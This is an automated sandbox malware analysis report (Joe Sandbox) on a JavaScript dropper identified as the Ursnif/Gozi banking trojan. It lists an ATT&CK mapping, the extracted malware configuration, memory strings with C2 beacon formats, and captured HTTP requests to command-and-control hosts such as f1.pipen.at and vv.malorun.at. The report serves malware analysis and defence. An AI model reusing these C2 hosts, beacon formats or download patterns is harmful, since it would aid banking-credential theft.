
Analysis Report view_attach_b8x.js

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 220434
Start date: 06.04.2020
Start time: 12:01:32
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 53s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: view_attach_b8x.js
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name: Without Instrumentation
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 4
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.bank.troj.spyw.evad.winJS@21/18@11/1
EGA Information:
  • Successful, ratio: 75%
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 108
  • Number of non-executed functions: 259
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, ielowutil.exe, WMIADAP.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 104.127.51.68, 92.123.7.209, 152.199.19.161
  • Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, fs.microsoft.com, go.microsoft.com, ie9comview.vo.msecnd.net, go.microsoft.com.edgekey.net, e1723.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 3036 because there are no executed functions
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | | false | Gozi Ursnif | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 1 | Windows Management Instrumentation 2 | Valid Accounts 1 | Valid Accounts 1 | Rundll32 1 | Credential Dumping 1 | System Time Discovery 1 | Remote File Copy 3 | Man in the Browser 1 | Data Encrypted 1 | Remote File Copy 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | Rundll32 1 | Port Monitors | Access Token Manipulation 1 | Scripting 2 | Network Sniffing | Account Discovery 1 | Remote Services | Data from Local System 1 | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | PowerShell 1 | Accessibility Features | Process Injection 713 | Obfuscated Files or Information 2 | Input Capture | Security Software Discovery 1 | Windows Remote Management | Email Collection 1 | Automated Exfiltration | Standard Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Scripting 2 | System Firmware | DLL Search Order Hijacking | Masquerading 1 | Credentials in Files | File and Directory Discovery 3 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol 4 | SIM Card Swap | | Premium SMS Toll Fraud
Exploit Public-Facing Application | Execution through API 1 | Shortcut Modification | File System Permissions Weakness | Valid Accounts 1 | Account Manipulation | System Information Discovery 35 | Shared Webroot | Data Staged | Scheduled Transfer | Connection Proxy 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface 1 | Modify Existing Service | New Service | Virtualization/Sandbox Evasion 2 | Brute Force | Virtualization/Sandbox Evasion 2 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | | Abuse Accessibility Features
Spearphishing Attachment | Command-Line Interface 12 | Path Interception | Scheduled Task | Access Token Manipulation 1 | Two-Factor Authentication Interception | Process Discovery 3 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Process Injection 713 | Bash History | Application Window Discovery 1 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | DLL Side-Loading 1 | Input Prompt | System Owner/User Discovery 1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | | Data Destruction
Trusted Relationship | PowerShell | Change Default File Association | Exploitation for Privilege Escalation | Connection Proxy 1 | Keychain | Process Discovery | Taint Shared Content | Audio Capture | Commonly Used Port | Connection Proxy | | | Data Encrypted for Impact

Signature Overview



AV Detection:

Found malware configuration
Source: regsvr32.exe.1836.3.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "292", "system": "3f177153870006aaa3a6cdc80cbbbd11hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1586199788", "user": "31b341dd54c8a3b79c4b2eb51b2eaed4", "hash": "0x0d8e127a", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: f1.pipen.at | Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: view_attach_b8x.js | Virustotal: Detection: 25%
Source: view_attach_b8x.js | ReversingLabs: Detection: 21%

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0513CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_0513CDF2
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0514940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_0514940E
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05138181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_05138181
Contains functionality to query local drives
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05147CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,3_2_05147CDC

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: regsvr32.exe, 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp | String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: regsvr32.exe, 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: api10.dianer.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /api1/RIkBvjzuoO/tMqxDBrVTRrzfr2Kb/53ovMdf_2BCA/h995fSUlMdo/mc7eqDY3_2FUly/NReA6hyL_2FV7VwyiTH2m/chFe5dw2XLD7Exw9/UbJaKUC2eEkW1Ll/KhVmYcOAeOE1kz4rpz/Nx61A1y_2/BBExcKhQfVhooPPFgMXC/KGe1JMDBYsLsDjNJ5kE/_2F1q9hvtwlpsG9tLoReF_/2FdaXDC3_2Fwb/7xUJtaUu/408U_2B96WK1lQNUPZlg5RL/EdC1k8lvoE/E30Zy0LeZZ_0A_0DS/bMk9lb8_2B2u/syGKhXf2s4M/RVmwZMar5Fa7_2/FNe_2BbPgl0iqbFKC_2FC/jooaXJQUQ7ZTC_2F/2JA HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: f1.pipen.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: f1.pipen.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/HVRdgLc7ESeoGO/rk3SKwyodoNRYK1XctSAH/GYrAAtY4ZkkFA692/Qn14u_2BARgo8Tu/I8dmXhIQ29xTUqXhFl/bkQ_2FU9A/5N_2FzL4x9Nz0wpe6qXF/gDrJCHqY_2FjN0BTosv/F_2FeWEiU6MlwnYmiWfBKX/opcKmF8q_2FR8/xWQmdt_2/BnAs2Wz8d9SYUiNL_2B3Gbd/s1buuYLnXt/N_2FZdESw4_2FKqX8/uyJkgwopKgtO/BSG9rbiUF8z/X7_2Flh_2FnVMP/TsMBsmJMBZMdgn_0A_0Dv/xPKvEnSd7Nf_2FCR/ev4nPGVYBGH4tKa/t_2FcDdMCoRGBbSt38/poXUB1YthiK/79lXSr9bR3/J HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: f1.pipen.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: f1.pipen.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/cihLfcpMy/efzR22ZLuifw3CQ8_2Bs/P4VCpXGcJTnQBznbCOS/STSG_2FF4kbAq_2BhV6cEi/uFtqETcU4xGth/YAXmdKUb/sLPsBxxkPEG2bECnoEuC4Ol/YLnPia_2Fk/NQYEDs97KJCz6TrIM/w1LcDsZ1UWgf/Zr9p72JZzOk/qL0nBfStLTVDdm/rNZchFj_2BOpz2zhAwfnk/YNjDoDQV0SduZ0YM/Lb8VWk_2F9zbIuE/dAwcNPDyrsLjoKv_2B/mEbIe3JXU/FSzXNLV3j_0A_0DyAvrZ/N6x3r1kX_2B0Rcy9CsC/NwpnQ9GW36MfD_2BGzwf6C/_2FTXNJPf30Rk/67iPYmFkPfLB/QeN HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: f1.pipen.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: f1.pipen.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: api10.dianer.at
Source: global traffic | HTTP traffic detected: GET /api1/H0ewpgT_2/FnBXywvSbAU9lyenuBLR/ZhWxWshQc1ABmmbCvMT/pq_2FQ_2BYaXTrCIdi_2Bc/fLuWDjB53EPmd/uT8vyxAk/SYgwfhScACSnAcsPXpwiXe9/Ixqk9mZmFo/swnyYFV2usY5WO8aS/0gEWnGCWOtXV/sEVZ19dS2qh/XzjUA9i8vXHiMr/txs5LwugQEjLQObfnuSc3/6IfU_2BpNi0BsiG7/25kAq_2F0v1pIsQ/C3S5huGGtXap7NWUfB/Sc7KDmr3K/j7n3L6d_0A_0D1pclX1o/I7KdU_2F1RDsHP2o2qr/Dsm00_2FJda9ptbobJWcea/n3S HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 | Host: vv.malorun.at
Source: global traffic | HTTP traffic detected: GET /api1/DSOyW32u0p/09xaC2PCkD_2BAlSq/AQZgOGEFGBwn/s8s6QgzsHUV/tnuTHdW6_2F4zs/w4k7w6mXiKWUYMCQTSBAD/9xAMtHwCmD5scw1P/fAWT3_2FMkX7Znm/3ZTEAwXpFCGHqTiolF/r4ZYt32K7/1G0T98uwXFz3FjN_2FgJ/Ng7nhnRkuoqkZ1xhO_2/FPEyghsFWMePg30vi83o4P/jZ45T_2BmZn42/za3j_2Fq/pKxHKUX3QeS7DdkIPwGSIv3/BJoH0PyKUo/NdtHotMK_0A_0DQlT/A5fi8Xw_2BIU/1piJNA2j9Be/2OfES2CnmL4N1PuIpyAnZX/c HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 | Host: vv.malorun.at
Source: global traffic | HTTP traffic detected: GET /api1/sooKQ9PSB77euyrf4LISpR/66iyqY7TD5dm8/pw_2BoKy/wqT0N6RVnjtiKpgMBpOM_2B/3_2B0Wm9I3/04eO6uIei4KKIRL_2/F2xzdWEge882/j8E0slfhrD_/2FvtCHZHiWQXNh/UVOKKc_2FGuk7jcQ3O77L/U7mMgws0OvkqAKM5/4RQFS_2B0eq89Jt/ccWdUliXrZxUko2r_2/BRUyhl2QP/Bjlow02qkzZG2uM1G2xu/_2FRgqBWswlgCa4jfov/3wK3clPoZ_2FpGNkwbfZs_/2BBb_0A_0DYWI/XCDhGc7c/_2FuIVk_2BTIaPB3OV2nvzI/Se8aU0pl1dRA8Fd/yM HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 | Host: vv.malorun.at
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: f1.pipen.at
Posts data to webserver
Source: unknown | HTTP traffic detected: POST /api1/2voe_2BiyW2Z7lZzdTQUp/h75WDPyTeR9cXeFO/xWRVODrX_2F3AuW/DoJI6_2F7sp3LyKJtr/leQAvTmod/P8_2B_2BHtjGRfBoWgoM/JpFo34sHeDTOnqStGcq/mWqLaNA_2BnFoNjGZl6_2F/idf4g5wEzlrWe/bOVfTl1N/uL05VLixDBmTG0YMHjZREy5/d0CH7FivQa/sUbDfXI_2Brye2tEc/4XkMMTm3A_2B/Cm1ZTQnDD9Y/lbbKXepaciRNXT/zaotExxjaBMXh5WEQvS5n/A_0A_0DoH7YTAB_2/BrIwtOS2W0tlBBX/QOKs2oR3st6st3uXGA/T3a776G HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 | Content-Length: 2 | Host: vv.malorun.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 06 Apr 2020 10:03:08 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Urls found in memory or binary data
Source: regsvr32.exe, control.exe, 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, control.exe, 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: regsvr32.exe, 00000003.00000003.1010006875.00000000001C0000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.1136260424.0000000007C26000.00000004.00000001.sdmp | String found in binary or memory: http://f1.pipen.at/api1/HVRdgLc7ESeoGO/rk3SKwyodoNRYK1XctSAH/GYrAAtY4ZkkFA692/Qn14u_2BARgo8Tu/I8dmXh
Source: explorer.exe, 00000010.00000000.1136260424.0000000007C26000.00000004.00000001.sdmp | String found in binary or memory: http://f1.pipen.at/api1/RIkBvjzuoO/tMqxDBrVTRrzfr2Kb/53ovMdf_2BCA/h995fSUlMdo/mc7eqDY3_2FUly/NReA6hy
Source: explorer.exe, 00000010.00000000.1117047191.0000000001170000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000011.00000000.1152895092.000001F26D790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000013.00000000.1164781219.000002DB88060000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1184426981.000001C7D3990000.00000002.00000001.sdmp | String found in binary or memory: http://f1.pipen.at/api1/cihLfcpMy/efzR22ZLuifw3CQ8_2Bs/P4VCpXGcJTnQBznbCOS/STSG_2FF4kbAq_2BhV6c
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: regsvr32.exe, 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, regsvr32.exe, 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, control.exe, 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000013.00000000.1164001909.000002DB87ADC000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000013.00000000.1164001909.000002DB87ADC000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.ux9
Source: RuntimeBroker.exe, 00000013.00000000.1164001909.000002DB87ADC000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobp/y
Source: RuntimeBroker.exe, 00000013.00000000.1164001909.000002DB87ADC000.00000004.00000001.sdmp | String found in binary or memory: http://ns.micro/1Y
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000010.00000000.1135071006.0000000007A37000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: RuntimeBroker.exe, 00000014.00000002.1184016017.000001C7D346B000.00000004.00000001.sdmp | String found in binary or memory: https://www.heise.de/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.974215448.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1010236467.0000000004F5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974824363.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974371336.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974507500.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974637108.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1154798973.00000133741C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1156601270.0000000000C3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974737633.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974879691.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, type: MEMORY
